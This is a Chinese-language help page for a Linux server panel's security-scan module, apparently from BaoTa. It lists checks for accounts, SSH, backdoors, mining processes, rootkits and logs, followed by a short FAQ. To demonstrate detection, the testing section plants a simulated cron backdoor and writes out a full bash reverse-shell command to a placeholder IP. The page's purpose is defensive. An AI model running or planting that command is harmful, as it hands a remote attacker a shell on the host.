1.软件位置:安全-安全检测-安全检测
2.执行时间:大概执行时间为2~3分钟,程序执行时间的长度由检测文件的多少决定,有可能会存在较长的时间,请耐心等待
一、功能介绍
这一款“安全检测”模块旨在对Linux主机排查时提供便利,支持系统安全配置、常见挖矿进程、恶意扫描进程等安全项检测,实现主机侧的自动全面化检测,方便后续进行黑客攻击路径溯源,排查入侵痕迹,定位恶意样本。
首页展示
共有十一个安全检测项,分别为系统账户检测、SSHD远程服务检测、重要文件权限及属性检测、重点软件检测、网站权限检测、后门检测、恶意进程检测、历史命令检测、日志排查、rookit检测以及其他项目检测。
二、检测项介绍
系统账户检测
检测非root的超级用户、空口令用户、用户权限异常以及账户密码策略不合理等问题
SSHD服务安全检测
检测内容如下:端口检测、当前版本是否存在漏洞、是否允许空密码登录
重要文件权限和属性检测
检测内容如下:重要系统执行文件权限/属性是否正常
重点软件检测
主要针对Apache、Nginx、Redis、FTP、MySQL这五个软件进行安全扫描。
检测内容如下:弱口令扫描、当前软件版本是否存在漏洞
网站权限检测
检测内容:web服务是否开启、网站目录权限设置是否正常
其余项目检测
检测内容:是否开启防火墙、umask安全配置检测
后门检测
检测内容包含有SSH Server wrapper检测、主机 Sudoer检测、alias检测、Setuid检测、主机计划任务内容检测、环境变量检测、系统启动服务检测、inetd配置文件检测、xinetd配置文件检测、预加载配置文件检测。
恶意进程检测
检测内容包含进程文件是否存在恶意代码、隐藏进程扫描、挖矿进程扫描。
主机历史命令检测
针对主机的历史命令进行安全排查,查看主机历史命令中是否存在恶意操作。
日志排查
该检测项通过对系统日志的详细分析,我们可以追踪到系统日志中存在恶意行为或者异常情况。
主机Rootkit检测
该检测项能够检测各种已知的rootkit特征码,并针对一些常用程序文件进行安全扫描,进而本服务器是否已经感染rootkit。
三、检测环节
模拟黑客,向目标系统植入一条简单的定时任务后门
- 0 15 2 15 * ? bash -i >& /dev/tcp/192.168.xxx.xxx/5566 0>&1
进行检测,结果如下
FAQ
1、什么是环境变量?他有什么作用?
答:在Linux操作系统中,环境变量是一组用于存储系统和应用程序信息的变量;环境变量会在系统开启的时候自动加载到操作系统中,并且可以在整个操作系统中访问。
2.什么是后门攻击?
答:一种绕过软件的安全性控制,从比较隐秘的通道获取对程序或系统访问权的黑客方法。
3.什么是Rootkit?
答:一款Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,从而让攻击者保住权限,以使它在任何时候都可以使用root 权限登录到别人的系统上。
如果有其他问题,请留言!
|
运维要高效,装宝塔
